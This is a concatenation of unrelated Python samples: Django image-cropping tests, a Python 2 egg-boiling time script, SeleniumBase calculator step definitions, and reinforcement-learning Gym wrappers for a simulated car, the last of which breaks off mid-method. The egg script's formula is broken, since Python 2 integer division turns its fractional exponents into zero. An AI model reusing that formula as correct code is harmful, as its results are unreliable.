    image = cd1.add_size_set(slug='mobile')[0]
    image.render()
    image.save()
    size = image.size
    # Rendered image takes on the size's exact dimensions.
    self.assertEquals(image.width, size.width)
    self.assertEquals(image.height, size.height)
    # Derived file must live at a different path from the original.
    self.assertNotEquals(image.original.image.path,
                         image.image.path)
    # Check that files are not the same
    new_image_hash = hashfile(image.image.path)
    self.assertNotEquals(
        hashfile( image.original.image.path ),
        new_image_hash
    )
    # Change the original image, and check that the derived image
    # also changes when re-rendered.
    cd1.size = CM.Size.objects.get(slug='thumb')
    cd1.render(force=True)
    cd1.save()
    image.render()
    image.save()
    self.assertNotEquals(
        hashfile(image.image.path),
        new_image_hash
    )
    # Check that the images are relative
    self.assert_(not os.path.isabs(cd1.image.name))
def test_delete(self):
    """
    Tests that deletion cascades from the root to all derived images.
    """
    self.create_size_sets()
    cd1 = self.get_test_image()
    for image in cd1.add_size_set(slug='facebook'):
        image.render()
        image.save()
    # NOTE(review): this second loop deliberately reuses (shadows) `image`,
    # deriving a second generation from the *last* first-level image only.
    for image in image.add_size_set(slug='facebook'):
        image.render()
        image.save()
    # 1 original + 2 first-level + 2 second-level derived images.
    self.assertEquals(CM.Image.objects.count(), 5)
    cd1.delete()
    self.assertEquals(CM.Image.objects.count(), 0)
def test_multi_level_delete(self):
    """
    Creates a multi-level tree from one image and deletes it.
    """
    self.create_size_sets()
    cd1 = self.get_test_image()
    stack = [cd1]
    # Breadth-first growth: appending to `stack` while enumerating it is
    # intentional -- newly created images are visited in later iterations.
    for i,image in enumerate(stack):
        for size_set in CM.SizeSet.objects.all():
            for new_image in image.add_size_set(size_set):
                new_image.render()
                new_image.save()
                stack.append(new_image)
        # Cap the growth so the test terminates in bounded time.
        if i > 20:
            break
    # We should have a lot of images.
    self.assertEquals(CM.Image.objects.count(), len(stack))
    cd1.delete()
    self.assertEquals(CM.Image.objects.count(), 0)
def test_manual_derive(self):
    """
    Tests that we can do one-off derived images.
    """
    self.create_size_sets()
    cd1 = self.get_test_image()
    img = cd1.new_derived_image()
    size = CM.Size.objects.create(slug='testing',
                                  width=100,
                                  height=100,
                                  auto_crop=True,
                                  retina=True)
    # Test the manual size exists (3 from create_size_sets + this one).
    self.assertEquals(CM.Size.objects.count(), 4)
    self.assertEquals( cd1.has_size('testing'), False )
    img.size = size
    # Check that the crop is deleted as well
    img.set_crop(0, 0, 200, 200).save()
    self.assertEquals(CM.Crop.objects.count(), 1)
    img.render()
    img.save()
    self.assertEquals( cd1.has_size('testing'), True )
    self.assertEquals(img.width, 100)
    self.assertEquals(img.height, 100)
    # Test that the manual size is deleted with the image.
    img.delete()
    self.assertEquals(CM.Size.objects.count(), 3)
    self.assertEquals(CM.Size.objects.filter(pk=size.id).count(), 0)
    self.assertEquals(CM.Crop.objects.count(), 0)
    # No more derived images.
    self.assertEquals(cd1.derived.count(), 0)
def test_crop(self):
    """Rendering with an explicit 300x300 crop yields those exact dimensions."""
    original = self.get_test_image()
    derived = original.new_derived_image()
    derived.set_crop(100, 100, 300, 300).save()
    derived.render()
    derived.save()
    self.assertEquals(derived.width, 300)
    self.assertEquals(derived.height, 300)
def test_no_modify_original(self):
    """
    Makes sure that a derived image cannot overwrite an original.
    """
    cd1 = self.get_test_image()
    orig_hash = hashfile(cd1.image.path)
    img = cd1.new_derived_image()
    img.set_crop(100, 100, 300, 300).save()
    img.render()
    img.save()
    # Original file untouched; the derived file differs from it.
    self.assertEquals(orig_hash, hashfile(cd1.image.path))
    self.assertNotEquals(orig_hash, hashfile(img.image.path))
def test_calc_sizes(self):
    """
    Tests that omitted dimension details are correctly calculated.
    """
    size = CM.Size(slug='1', width=100, aspect_ratio=1.6)
    # Height derived from width / aspect_ratio.
    self.assertEquals(size.get_height(), round(100/1.6))
    size2 = CM.Size(slug='2', height=100, aspect_ratio=2)
    # Width derived from height * aspect_ratio.
    self.assertEquals(size2.get_width(), 200)
    size3 = CM.Size(slug='3', height=3, width=4)
    # Aspect ratio is evidently rounded to two decimals (4/3 -> 1.33).
    self.assertEquals(size3.get_aspect_ratio(), 1.33)
def test_variable_sizes(self):
    """
    Tests that variable sizes work correctly.
    """
    cd1 = self.get_test_image()
    img = cd1.new_derived_image()
    size = CM.Size(slug='variable', width=100, aspect_ratio=1.6)
    size.save()
    img.size = size
    img.render()
    img.save()
    self.assertEquals(size.get_height(), img.height)
    # Only width or only height: the missing dimension should come from
    # the original image's aspect ratio.
    size = CM.Size(slug='width_only', width=100)
    img.size = size
    img.render()
    img.save()
    self.assertEquals(img.width, 100)
    self.assertEquals(int(round(100/cd1.aspect_ratio)), img.height)
    self.assertEquals(cd1.aspect_ratio, img.aspect_ratio)
    size = CM.Size(slug='height_only', height=100)
    img.size = size
    img.render()
    img.save()
    self.assertEquals(img.height, 100)
    self.assertEquals(int(round(100 * cd1.aspect_ratio)), img.width)
    self.assertEquals(cd1.aspect_ratio, img.aspect_ratio)
def _test_delete_images(self):
    """
    Check that all image files are correctly deleted. Commented out since
    right now we don't really care about it.
    """
    # The leading underscore keeps the test runner from collecting this.
    self.create_size_sets()
    cd1 = self.get_test_image()
    paths = []
    for image in cd1.add_size_set(slug='facebook'):
        image.render()
        image.save()
        paths.append(image.image.path)
    # Check that the paths are unique
    self.assertEquals(len(paths), len(set(paths)))
    for path in paths:
        self.assert_(os.path.exists(path), "Image at %s does not exist!" % path)
    cd1.delete()
    for path in paths:
        self.assert_(not os.path.exists(path), "Image at %s was not deleted!" % path)
def test_retina_image(self):
    """
    Tests that retina images are properly rendered when they can be.
    """
    cd1 = self.get_test_image()
    size1 = CM.Size(slug='thumbnail',
                    width=128,
                    height=128,
                    retina=True)
    size1.save()
    img1 = cd1.new_derived_image()
    img1.size = size1
    img1.render()
    img1.save()
    # Retina images can't be handled directly, they only give a path.
    self.assertEquals(img1.retina_path,
                      to_retina_path(img1.image.path))
    # The @2x file should be exactly double the logical dimensions.
    retina = Image.open(img1.retina_path)
    self.assertEquals(retina.size, (img1.width*2, img1.height*2))
    # Check that the retina is removed if the retina would be too large.
    size1.width = cd1.width - 20
    size1.height = cd1.height - 20
    size1.save()
    img1.render()
    # Check we don't prematurely delete the retina
    self.assert_(os.path.isfile(img1.retina_path))
    img1.save()
    self.assert_(not os.path.isfile(img1.retina_path))
def test_size_aspect_ratio(self):
    """Regression test: aspect_ratio must survive Size construction and save."""
    test_size = CM.Size(slug='test', width=100, aspect_ratio=12)
    test_size.save()
    self.assertEquals(test_size.aspect_ratio, 12)
def test_bad_mimetype(self):
    """
    Tests that we can handle incorrectly extensioned images.
    """
    # Copy the jpeg fixture to a name with a bogus extension.
    NEW_TEST_IMAGE = TEST_IMAGE + '.gif.1'
    shutil.copyfile(TEST_IMAGE, NEW_TEST_IMAGE)
    cd1 = self.get_test_image(NEW_TEST_IMAGE)
    img = cd1.new_derived_image()
    size = CM.Size(slug='thumbnail',
                   width=128,
                   height=128,
                   retina=True)
    size.save()
    img.size = size
    # Since the extension is clearly incorrect (should be jpeg), it should
    # still save it as jpeg.
    img.render()
    img.save()
def test_attribution_cascade(self):
    """
    Tests that attribution is correctly propagated through from originals
    to children.
    """
    cd1 = self.get_test_image()
    img = cd1.new_derived_image()
    img.set_manual_size(width=100, height=100).save()
    img.render()
    img.save()
    # Derived images inherit the root image's metadata.
    self.assertEquals(img.metadata.attribution,
                      cd1.metadata.attribution)
    self.assertEquals(img.metadata.caption,
                      cd1.metadata.caption)
def test_recursive_save(self):
    """
    Tests that we recursively save all root and intermediate images
    when saving a leaf image, if they have not been saved.
    """
    cd1 = CM.Image(image=TEST_IMAGE)
    d1 = cd1.new_derived_image()
    d2 = d1.new_derived_image()
    d3 = d2.new_derived_image()
    d4 = d3.new_derived_image()
    # Nothing's been saved, so nothing should have an id.
    # Bug fix: d4 was missing from this tuple, so the leaf was never
    # included in the initial or final pk assertions.
    images = (cd1, d1, d2, d3, d4)
    for i in images:
        self.assertEquals(i.pk, None)
    # Save partway down the chain.
    d2.save()
    # Check that the ancestors were saved, with ascending pks.
    last = None
    for i in (cd1, d1, d2):
        self.assert_(i.pk > last)
        last = i.pk
    # Check that the descendents are NOT saved
    for i in (d3, d4):
        self.assertEquals(i.pk, None)
    # Saving the leaf should save the remaining intermediates too.
    d4.save()
    last = None
    for i in images:
        self.assert_(i.pk > last)
        last = i.pk
def test_variable_dimension(self):
    """
    Tests that variable dimensions work properly.
    """
    cd1 = self.get_test_image()
    img = cd1.new_derived_image()
    # Only width is fixed; height should follow the crop's aspect ratio.
    size = CM.Size(slug='thumbnail',
                   width=128,
                   retina=True)
    size.save()
    img.size = size
    img.set_crop(100,100,400,400).save()
    img.render()
    img.save()
    # Square crop -> square output.
    self.assertEquals(img.width, 128)
    self.assertEquals(img.height, 128)
    img.set_crop(1,1,128,256).save()
    img.render()
    img.save()
    # 1:2 crop -> height is double the fixed width.
    self.assertEquals(img.width, 128)
    self.assertEquals(img.height, 256)
def test_from_stream(self):
    """
    Tests that streaming in data saves correctly, and into the correct location.
    """
    # Fake loading it from a stream.
    cd1 = self.get_test_image(image=None)
    # Python 2 builtin file(); wrap the fixture bytes in a Django ContentFile.
    cf = ContentFile(file(TEST_IMAGE).read())
    basename = os.path.basename(TEST_IMAGE)
    cd1.image.save(basename, cf)
    cd1.save()
    self.assert_(settings.UPLOAD_PATH in cd1.image.path)
    # 897 is the known pixel width of the test fixture image.
    self.assertEquals(cd1.image.width, 897)
def test_custom_upload_to(self):
    """
    Tests whether we can set a custom cropduster upload to path.
    """
    tm = TestModel()
    # Get the proxy image class
    image_cls = tm._meta.get_field_by_name('image')[0].rel.to
    image = image_cls()
    # Mimic uploading img
    cf = ContentFile(file(TEST_IMAGE).read())
    basename = os.path.basename(TEST_IMAGE)
    image.image.save(basename, cf)
    image.save()
    tm.image = image
    tm.save()
    # The upload_to pattern 'test/%Y/%m/%d' should appear in the stored name.
    path = datetime.datetime.now().strftime('/test/%Y/%m/%d')
    self.assert_(path in tm.image.image.name)
def test_dynamic_path(self):
    """Exercises upload_to callables that receive the model instance (Counter)."""
    self.create_size_sets()
    tm = TestModel2()
    # Get the proxy image class
    image_cls = tm._meta.get_field_by_name('image')[0].rel.to
    image = image_cls()
    # Mimic uploading img
    cf = ContentFile(file(TEST_IMAGE).read())
    basename = os.path.basename(TEST_IMAGE)
    image.image.save(basename, cf)
    image.save()
    # Setup the children
    for derived in image.add_size_set(name='Facebook'):
        derived.render()
        derived.save()
    # Base assert: Counter() has been invoked once at this point.
    self.assert_( image.image.name.endswith( '/1/%s' % basename ),
                  "Path mismatch: %s, %s" % (image.image.name, basename) )
    old_name = image.image.name
    # Save the model; each save re-invokes the upload_to callable.
    tm.image = image
    tm.save()
    self.assert_( image.image.name.endswith( '/2/%s' % basename ),
                  "Path mismatch: %s, %s" % (image.image.name, basename) )
    self.assert_(os.path.isfile(tm.image.image.path), "Path %s is missing" % tm.image.image.path)
    # Setting a slug routes through Counter's instance branch.
    tm.slug = 'foobar'
    tm.save()
    self.assert_( image.image.name.endswith( '/3/foobar/%s' % basename ),
                  "Path mismatch: %s, %s" % (image.image.name, basename) )
    # Everything should be different now...
    self.assert_(os.path.isfile(tm.image.image.path), "Path %s is missing" % tm.image.image.path)
    # Check that the children's retina images have moved.
    # NOTE(review): `image` is rebound here, shadowing the parent above.
    for image in tm.image.descendants:
        if image.size.retina:
            self.assert_(os.path.isfile(image.retina_path), "Retina didn't get moved!")
def test_proxy_image_convert(self):
    """
    Tests that regular cropduster image saved to fields which use proxy versions.
    """
    cd1 = self.get_test_image()
    t = TestModel()
    # Assigning to the field converts cd1 to the field's proxy subclass.
    t.image = cd1
    self.assert_(isinstance(cd1, CM.Image))
    self.assertNotEquals(type(cd1), CM.Image)
    self.assert_(issubclass(type(cd1), CM.Image))
    # Non-image values must be rejected with ValueError.
    try:
        t.image = object()
        self.fail("This shouldn't be allowed!")
    except ValueError:
        pass
def test_absolute_url(self):
    """
    Tests whether absolute urls are created correctly.
    """
    cd1 = self.get_test_image()
    cd1.save()
    image_basename = os.path.basename(TEST_IMAGE)
    # Test without hash
    image_url = cd1.get_absolute_url(False)
    self.assertEquals(image_url, os.path.join(settings.STATIC_URL, cd1.image.url))
    # Test with hash
    image_url_hash = cd1.get_absolute_url()
    self.assert_('?' in image_url_hash, "Missing timestamp hash")
    last_timestamp = None
    for i in xrange(2):
        # Re-save to update the date_modified timestamp
        cd1.save()
        # Check the timestamp changed
        self.assertNotEquals(last_timestamp, cd1.date_modified)
        last_timestamp = cd1.date_modified
    # NOTE(review): the hash below was computed *before* the re-saves above;
    # confirm the intended relationship between the url hash and date_modified.
    raw_url, timestamp = image_url_hash.split('?')
    self.assertEquals(raw_url, image_url)
    # Convert the hex back to the original
    hashed_time = datetime.datetime.fromtimestamp(int(timestamp, 16))
    # No microseconds on hashes, giving us a hash granularity
    # of one second.
    date_modified = cd1.date_modified - \
        datetime.timedelta(microseconds = cd1.date_modified.microsecond)
    self.assertEquals(date_modified, hashed_time)
def test_auto_transcode(self, normalize_ext=False):
    """
    Tests that transcoding image formats works correctly.

    Bug fix: the finally block previously restored CROPDUSTER_TRANSCODE to
    the override value {'JPEG': 'GIF'} instead of the saved original,
    leaking the setting into every later test. The setup is also moved
    inside the try so a failure there still restores the settings.
    """
    # Save JPEGS as GIFs
    cur_transcode = getattr(settings, 'CROPDUSTER_TRANSCODE', {})
    setattr(settings, 'CROPDUSTER_TRANSCODE', {'JPEG': 'GIF'})
    if normalize_ext:
        cur_normalize = getattr(settings, 'CROPDUSTER_NORMALIZE_EXT', False)
        setattr(settings, 'CROPDUSTER_NORMALIZE_EXT', True)
    try:
        cd1 = self.get_test_image()
        cd1.save()
        # New derived with arbitrary crop
        img = cd1.new_derived_image()
        img.set_crop(100, 100, 300, 300).save()
        img.render()
        img.save()
        # The rendered file must actually be a GIF...
        self.assertEquals(Image.open(img.image.path).format, 'GIF')
        # ...and its extension depends on the normalization setting.
        if normalize_ext:
            self.assertEquals(os.path.splitext(img.image.path)[1], '.gif')
        else:
            self.assertEquals(os.path.splitext(img.image.path)[1], '.jpg')
    finally:
        setattr(settings, 'CROPDUSTER_TRANSCODE', cur_transcode)
        if normalize_ext:
            setattr(settings, 'CROPDUSTER_NORMALIZE_EXT', cur_normalize)
def test_normalize_ext(self):
    """Extension normalization: rerun the transcode test with normalize_ext on."""
    self.test_auto_transcode(normalize_ext=True)
class TestModel(models.Model):
    # Model exercising CropDusterField variants: a dated upload path, a
    # nullable field with a custom related_name, and an explicit `to=` target.
    image = CM.CropDusterField(upload_to='test/%Y/%m/%d')
    image2 = CM.CropDusterField(null=True, related_name='image2')
    image3 = CM.CropDusterField(to=CM.Image, null=True, related_name='image3')
class Counter(object):
    """Callable upload-path generator.

    Each call prefixes the filename with a monotonically increasing counter,
    and inserts the instance's slug when an instance is supplied.
    """
    # Class-level start value; the first `self.counter += 1` creates an
    # instance attribute, so instances count independently.
    counter = 0

    def __call__(self, filename, instance=None):
        self.counter += 1
        # Bug fix: replaced the deprecated Python 2 backtick repr
        # (`self.counter`) -- a syntax error in Python 3 -- with str(),
        # which produces identical output for ints.
        counter = str(self.counter)
        if instance is None:
            return '%s/%s' % (counter, filename)
        return os.path.join(counter, instance.slug, filename)
class TestModel2(models.Model):
    # `slug` is read by the Counter upload_to callable when building
    # dynamic upload paths.
    slug = ""
    image = CM.CropDusterField(upload_to=Counter(),
                               dynamic_path=True)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
StarcoderdataPython
|
9699812
|
<reponame>mdmintz/seleniumspot
from behave import step
@step("Open the Calculator App")
def go_to_calculator(context):
    # context.sb is the SeleniumBase instance supplied by the behave environment.
    context.sb.open("https://seleniumbase.io/apps/calculator")
@step("Press C")
def press_c(context):
    # Clear the calculator display.
    context.sb.click("button#clear")
@step("Press (")
def press_open_paren(context):
    # Symbol-id buttons need an attribute selector rather than a #id selector.
    context.sb.click('button[id="("]')
@step("Press )")
def press_close_paren(context):
    # Close-parenthesis button.
    context.sb.click('button[id=")"]')
@step("Press ÷")
def press_divide(context):
    # Division operator button.
    context.sb.click("button#divide")
@step("Press ×")
def press_multiply(context):
    # Multiplication operator button.
    context.sb.click("button#multiply")
@step("Press -")
def press_subtract(context):
    # Subtraction operator button.
    context.sb.click("button#subtract")
@step("Press +")
def press_add(context):
    # Addition operator button.
    context.sb.click("button#add")
@step("Press =")
def press_equal(context):
    # Evaluate the current expression.
    context.sb.click("button#equal")
@step("Press 1")
def press_1(context):
    # Digit button 1.
    context.sb.click('button[id="1"]')
@step("Press 2")
def press_2(context):
    # Digit button 2.
    context.sb.click('button[id="2"]')
@step("Press 3")
def press_3(context):
    # Digit button 3.
    context.sb.click('button[id="3"]')
@step("Press 4")
def press_4(context):
    # Digit button 4.
    context.sb.click('button[id="4"]')
@step("Press 5")
def press_5(context):
    # Digit button 5.
    context.sb.click('button[id="5"]')
@step("Press 6")
def press_6(context):
    # Digit button 6.
    context.sb.click('button[id="6"]')
@step("Press 7")
def press_7(context):
    # Digit button 7.
    context.sb.click('button[id="7"]')
@step("Press 8")
def press_8(context):
    # Digit button 8.
    context.sb.click('button[id="8"]')
@step("Press 9")
def press_9(context):
    # Digit button 9.
    context.sb.click('button[id="9"]')
@step("Press 0")
def press_0(context):
    # Digit button 0.
    context.sb.click('button[id="0"]')
@step("Press ←")
def press_delete(context):
    # Backspace: delete the last entered character.
    context.sb.click("button#delete")
@step("Press .")
def press_dot(context):
    # Decimal-point button.
    context.sb.click('button[id="."]')
@step("Press [{number}]")
def enter_number_into_calc(context, number):
    """Click the digit button for each character of *number*, in order."""
    for digit in number:
        context.sb.click('button[id="%s"]' % digit)
@step("Evaluate [{equation}]")
def evaluate_equation(context, equation):
    """Key in *equation* character by character, then press '='.

    Spaces are skipped, the four operator glyphs map to their named
    buttons, and every other character is clicked via its id attribute.
    """
    sb = context.sb
    operator_selectors = {
        "÷": "button#divide",
        "×": "button#multiply",
        "-": "button#subtract",
        "+": "button#add",
    }
    for key in equation:
        if key == " ":
            continue
        selector = operator_selectors.get(key)
        if selector is None:
            selector = 'button[id="%s"]' % key
        sb.click(selector)
    sb.click("button#equal")
@step('Verify output is "{output}"')
def verify_output(context, output):
    # Assert the display (#output) shows exactly the expected text.
    sb = context.sb
    sb.assert_exact_text(output, "#output")
@step("Save calculator screenshot to logs")
def save_calculator_screenshot_to_logs(context):
    # Capture the current page into the SeleniumBase logs directory.
    sb = context.sb
    sb.save_screenshot_to_logs()
|
StarcoderdataPython
|
6462342
|
from math import *
#Primero, pedimos la temperatura original del huevo.
t0 = float(raw_input("Ingrese la temperatura original del huevo: "))
#Ahora, establezcamos los datos.
M = 63 #Masa. Asumiremos un huevo grande
c = 3.7 #Capacidad calorifica especifica
ro = 1.038 #Densidad
K = 0.0054 #Conductividad termica
tw = 100 #Temperatura de ebullicion del agua
ty = 70 #Temperatura final
#Ahora, calculamos el tiempo necesario para llegar a la temperatura final
t = ( (M**(2/3) * c * ro**(1/3)) / (K * pi**2 * ((4 * pi)/3)**(2/3) ) * log( 0.76 * ((t0 - tw)/(ty - tw)) ))
print "El tiempo necesario es "+str(t)+" s"
|
StarcoderdataPython
|
8080876
|
import matplotlib.pyplot as plt
import gym
import time
from csv import writer
from stable_baselines3.common.type_aliases import GymObs, GymStepReturn
from typing import Union
import numpy as np
import os
from typing import Optional
from autoencoder import load_ae
import gym.wrappers
class AutoEncoderWrapper(gym.Wrapper):
    """Replaces raw image observations with the autoencoder's latent vector."""

    def __init__(self, env, ae_path):
        super().__init__(env)
        self.env = env
        assert ae_path is not None
        self.ae = load_ae(ae_path)
        # Latent observations are unbounded float vectors of length z_size.
        self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(self.ae.z_size,), dtype=np.float32)

    def reset(self):
        # [:, :, ::-1] reverses the channel axis (BGR <-> RGB) before encoding.
        return self.ae.encode_from_raw_image(self.env.reset()[:, :, ::-1]).flatten()

    def step(self, action):
        obs, reward, done, infos = self.env.step(action)
        # Encode the new frame; reward/done/info pass through unchanged.
        return self.ae.encode_from_raw_image(obs[:, :, ::-1]).flatten(), reward, done, infos
class AutoEncoderHistoryWrapper(gym.Wrapper):
    """Autoencoder observations augmented with a rolling history of the last
    `num_history` (steering, throttle) commands, plus a shaped reward."""

    def __init__(self, env: gym.Env, ae_path, num_history=10, max_throttle=1.0, min_throtthle=0.0, left_steering=-1.0, right_steering=1.0) -> None:
        super().__init__(env)
        self.env = env
        self.ae = load_ae(ae_path)
        self.max_throttle = max_throttle
        self.min_throttle = min_throtthle
        self.left_sterring = left_steering
        self.right_steering = right_steering
        # Commands per action: (steering, throttle).
        self.num_command = 2
        # Maximum allowed steering change per step (used by commented-out code).
        self.steering_diff = 0.15-1e-5
        self.num_history = num_history
        # Row vector holding the last num_history commands, newest at the end.
        self.history = np.zeros((1, self.num_command*self.num_history), dtype=np.float32)
        self.action_space = gym.spaces.Box(
            low=np.array([np.float32(self.left_sterring), np.float32(self.min_throttle)]),
            high=np.array([np.float32(self.right_steering), np.float32(self.max_throttle)]),
            dtype=np.float32
        )
        # Observation = latent vector concatenated with the command history.
        self.observation_space = gym.spaces.Box(
            low=np.finfo(np.float32).min,
            high=np.finfo(np.float32).max,
            shape=(1,self.ae.z_size + self.num_command*self.num_history),
            dtype=np.float32
        )

    def reset(self, **kwargs) -> GymObs:
        """Encode the first frame and clear the command history."""
        obs = self.ae.encode_from_raw_image(self.env.reset()[:, :, ::-1]).flatten()
        obs = np.reshape(obs, (1, self.ae.z_size))
        self.history = np.zeros((1, self.num_command*self.num_history), dtype=np.float32)
        observation = np.concatenate((obs, self.history), axis=-1)
        return observation

    def step(self, action: Union[np.ndarray, int]) -> GymStepReturn:
        # last_steering = self.history[0, -2]
        # diff = np.clip(action[0] - last_steering, -self.steering_diff, self.steering_diff)
        # #print(f"pred {action[0]} - last {last_steering} - now {last_steering + diff}")
        # action[0] = last_steering + diff
        # Shift the history left by one command and append the new action.
        self.history = np.roll(self.history, shift=-self.num_command, axis=-1)
        self.history[..., -self.num_command:] = action
        obs, reward, done, info = self.env.step(action)
        obs = self.ae.encode_from_raw_image(obs[:, :, ::-1]).flatten()
        obs = np.reshape(obs, (1, self.ae.z_size))
        # if action[1] == 0.0:
        #     action[1] = 0.1
        #prev_steering = self.history[0, -1]
        # # print("prev_steer", prev_steering)
        # # print("now steer", action[0])
        #diff = np.clip(action[0]- prev_steering, -self.steering_diff, self.steering_diff)
        # # print("diff: ",diff)
        #action[0] = prev_steering + diff
        # # print("NEW steer", action[0], "\n")
        observation = np.concatenate((obs, self.history), axis=-1)
        return observation, self.new_reward(reward), done, info

    def new_reward(self, reward):
        """Penalize abrupt steering changes and scale crash penalties by throttle."""
        # history[0, -2] is the latest steering; history[0, -4] the previous one.
        steering = self.history[0, 1*-self.num_command]
        last_steering = self.history[0, 2*-self.num_command]
        # print(f"Original reward: {reward} steer {steering} last_steer {last_steering} ")
        angle_diff = abs(steering - last_steering)
        penalization = 0
        if angle_diff > 0.15:
            penalization = 2*angle_diff
        if reward < 0:
            # NOTE(review): len(self.history) is 1 (row count), so this loop
            # runs once -- presumably num_history was intended; confirm.
            for i in range(len(self.history)):
                if self.history[0, i * -self.num_command] >= 0.001:
                    reward = -20 * self.history[0, i * -self.num_command]
                    break
        if reward > 0 and penalization > 0:
            reward = 0
        # print(f" penalize: {penalization} ang_dif {angle_diff}")
        reward -= penalization
        return reward
from threading import Event, Thread
# class DonkeyViewWrapper(gym.ObservationWrapper):
# import pygame
# def __init__(self, env, path_ae):
# gym.ObservationWrapper.__init__(self, env)
# self.env = env
# self.ae = load_ae(path_ae)
# self.display_width = 640
# self.display_height = 320
# self.game_display = None
# self.raw_observation = None
# self.decoded_surface = None
# self.BLACK = (0, 0, 0)
# self.WHITE = (255, 255, 255)
# self.YELLOW = (255, 255, 0)
# self.BLUE = (0, 0, 255)
# self.reconstructed_image = None
# self.ae_observation = None
# self.game_over = False
# self.start_process()
# def main_loop(self):
# pygame.init()
# self.game_display = pygame.display.set_mode((self.display_width, self.display_height))
# pygame.display.set_caption('Agent View')
# clock = pygame.time.Clock()
# self.game_display.fill(self.WHITE)
# while not self.game_over:
# self.upateScreen()
# clock.tick(30)
# def start_process(self):
# """Start main loop process."""
# self.process = Thread(target=self.main_loop)
# self.process.daemon = True
# self.process.start()
# def pilImageToSurface(self, pilImage):
# pilImage = pilImage.resize((640, 320))
# return pygame.image.fromstring(
# pilImage.tobytes(), pilImage.size, pilImage.mode).convert()
# def upateScreen(self):
# self.game_display.fill((0, 0, 0))
# if self.reconstructed_image is not None:
# pygame_surface = self.pilImageToSurface(self.reconstructed_image)
# self.game_display.blit(pygame_surface, pygame_surface.get_rect(center=(320, 160)))
# pygame.display.update()
# def observation(self, observation):
# # logger.info(observation.shape)
# vae_dim = self.ae.z_size
# self.ae_observation = observation.copy()
# encoded = self.ae_observation.reshape(1, self.ae.z_size)
# # encoded = self.ae_observation[:, :vae_dim]
# self.reconstructed_image = self.ae.decode(encoded)
# self.reconstructed_image = np.reshape(self.reconstructed_image, (80,160,3))
# plt.imshow(self.reconstructed_image)
# plt.show()
# return observation
class SteeringSmoothWrapper(gym.RewardWrapper):
    """Reward shaping: rewards throttle in a moderate band and current speed,
    and penalizes abrupt steering changes between consecutive steps."""

    def __init__(self, env: gym.Env) -> None:
        super().__init__(env)
        self.last_steering = 0.0
        self.speed = 0.0
        self.throttle = 0.0
        # self.velocities = np.ones((1, 10), dtype=np.float32)

    def reset(self, **kwargs):
        # Bug fix: this previously assigned `self.hrottle` (typo), so the
        # throttle was never reset between episodes -- the assignment only
        # created a stray attribute.
        self.last_steering = 0.0
        self.throttle = 0.0
        self.speed = 0.0
        return self.env.reset(**kwargs)

    def step(self, action):
        observation, reward, done, info = self.env.step(action)
        self.speed = info["speed"]
        return observation, self.reward(reward, action), done, info

    def reward(self, reward, action):
        """Shape the raw reward with throttle, speed and steering smoothness."""
        angle = action[0]
        self.throttle = action[1]
        angle_diff = abs(angle - self.last_steering)
        self.last_steering = angle
        contrib_throttle = 0
        if reward > 0:
            # Encourage moderate throttle; discourage crawling.
            if self.throttle >= 0.3 and self.throttle <= 0.6:
                contrib_throttle = self.throttle * 4
            elif self.throttle < 0.1:
                contrib_throttle = -1
            if angle_diff > 0.15:
                # Penalize jerky steering.
                reward_return = reward + contrib_throttle + self.speed - (3 * angle_diff)
                # print(f"PEN reward: {reward_return} - rew {reward} cont_thr {contrib_throttle} th{self.throttle}")
                return reward_return
            reward_return = (reward + contrib_throttle + self.speed)
            # print(f"PRO reward: {reward_return} - rew {reward} cont_thr {contrib_throttle} th{self.throttle} speed {self.speed}")
            return reward_return
        # Non-positive base rewards pass through unchanged.
        return reward
class ActionClipWrapper(gym.ActionWrapper):
    """Limits how fast the steering command may change between steps."""

    def __init__(self, env: gym.Env) -> None:
        super().__init__(env)
        self.last_steering = 0.0

    def action(self, action):
        # Clamp the per-step steering delta to +/-0.15 to smooth control.
        diff = np.clip(action[0] - self.last_steering, -0.15, 0.15)
        #print(f"pred {action[0]} - last {last_steering} - now {last_steering + diff}")
        action[0] = self.last_steering + diff
        #steering = (.4*action[0])+(.6*self.last_steering)
        # print(f"CLIP ACTION: new {steering} old {action[0]} prec {self.last_steering}")
        #action[0] = steering
        self.last_steering = action[0]
        return action
class MyMonitor(gym.Wrapper):
    """Per-episode metrics logger.

    Accumulates per-step statistics (steering, throttle, speed, reward,
    CTE, distance, laps, collisions) and appends one CSV row per finished
    episode to <log_dir>/<name_model>_metric.csv.
    """

    def __init__(self, env: gym.Env, log_dir, name_model) -> None:
        super().__init__(env)
        self.env = env
        self.file = open(os.path.join(str(log_dir), name_model+"_metric.csv"), "w+")
        self.log = writer(self.file)
        self.log.writerow(['Episode', 'Timestep', 'Avg Steer', 'Min Reward',
                           'Avg Reward', 'Max Reward', 'Reward Sum', 'Episode Length (timestep)',
                           'Episode Time', 'Avg Speed', 'Max Speed', 'Min CTE', 'Avg CTE', 'Max CTE',
                           'Distance', "Average Throttle", "Max Throttle", "Min Throttle",
                           "Average Absolute CTE", "Min Absolute CTE", "Max Absolute CTE", "Hit",
                           "Num lap", "Avg time lap", "Best time lap", ])
        self.episode = 0
        self.time_step = 0

    def reset(self, **kwargs) -> GymObs:
        """Reset all per-episode accumulators and the wrapped environment."""
        self.start_episode = time.time()
        self.episode_len = 0
        self.steers = []
        self.throttles = []
        self.rewards = []
        self.velocities = []
        self.ctes = []
        self.ctes_absolute = []
        self.distance = 0.0
        self.distance_time = self.start_episode
        self.episode += 1
        self.num_lap = 0
        self.laps_time = []
        self.hit = 0
        return self.env.reset(**kwargs)

    def step(self, action: Union[np.ndarray, int]) -> GymStepReturn:
        """Record the step's metrics and write the CSV row when the episode ends."""
        observation, reward, done, info = self.env.step(action)
        self.time_step += 1
        self.steers.append(action[0])
        self.throttles.append(action[1])
        self.velocities.append(round(info["speed"], 4))
        self.rewards.append(round(reward, 4))
        self.ctes.append(round(info["cte"], 4))
        self.ctes_absolute.append(round(abs(info["cte"]), 4))
        # Integrate distance as speed * wall-clock time since last step.
        self.distance += info["speed"] * (time.time() - self.distance_time)
        self.distance_time = time.time()
        self.episode_len += 1
        self.num_lap = info["num_lap"]
        if info["time_last_lap"] > 0:
            self.laps_time.append(info["time_last_lap"])
        if info["hit"] != "none":
            self.hit += 1
        if done:
            unique_time_laps = []
            avg_time_lap = 0.0
            best_time_lap = 0.0
            if self.num_lap > 0:
                # De-duplicate lap times (the env repeats time_last_lap each step).
                unique_time_laps.append(np.unique(self.laps_time))
                avg_time_lap = np.mean(unique_time_laps)
                best_time_lap = np.min(unique_time_laps)
